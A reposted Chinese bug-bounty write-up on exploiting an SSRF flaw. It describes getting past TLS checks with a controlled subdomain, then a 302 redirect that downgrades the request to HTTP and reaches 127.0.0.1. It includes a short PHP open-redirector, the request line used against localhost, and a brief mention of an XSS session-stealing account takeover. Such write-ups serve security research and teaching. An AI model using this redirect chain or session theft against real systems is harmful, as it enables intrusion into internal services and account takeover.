文章总结： 本文记录了一次通过URL拼接导致的SSRF漏洞挖掘过程。测试发现虽然能触发DNS请求，但因SSL证书验证失败无法建立HTTP连接。作者通过配置具有有效证书的自定义子域名绕过SSL限制，并利用HTTP302重定向技巧将HTTPS请求降级，成功实现对内网地址127.0.0.1的访问，展示了SSRF在HTTPS限制下的进阶利用技巧。 综合评分： 90 文章分类： SRC活动,渗透测试,WEB安全,漏洞分析

但我仍然无法访问本地主机服务，因为 URL 被迫使用https .如果控制域解析为127.0.0.1 ，则 TLS 证书验证失败，从而阻止连接。

由于我们可以控制页面的内容，这里还可以打一个xss账号接管,该负载窃取了登录用户的会话并触发了密码更改

通过重定向将 HTTPS 降级为 HTTP（完整 SSRF）

要访问本地服务，我需要服务器返回内网地址，这里使用一个重定向降级，大多数 HTTP 客户端默认遵循重定向

我在服务器上实现了一个简单的 PHP 重定向器，它接受一个参数并发出重定向到它

<?php$url&nbsp;=&nbsp;isset($GET['u']) ?&nbsp;$GET['u'] :&nbsp;'';$url&nbsp;=&nbsp;str_replace(array("\r","\n"),&nbsp;'',&nbsp;$url);if&nbsp;($url&nbsp;===&nbsp;'') {&nbsp;http_response_code(400);&nbsp;echo&nbsp;"Missing u";&nbsp;exit; }header("Location:&nbsp;$url",&nbsp;true,&nbsp;302);exit;

请求为这样

cdn.external-host.com.0xdarkt.com/redirect.php?u=http://127.0.0.1

服务器遵循重定向并获取 . 成功了

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：T6 sec T6 sec《【国外src案例】坎坷的全回ssrf》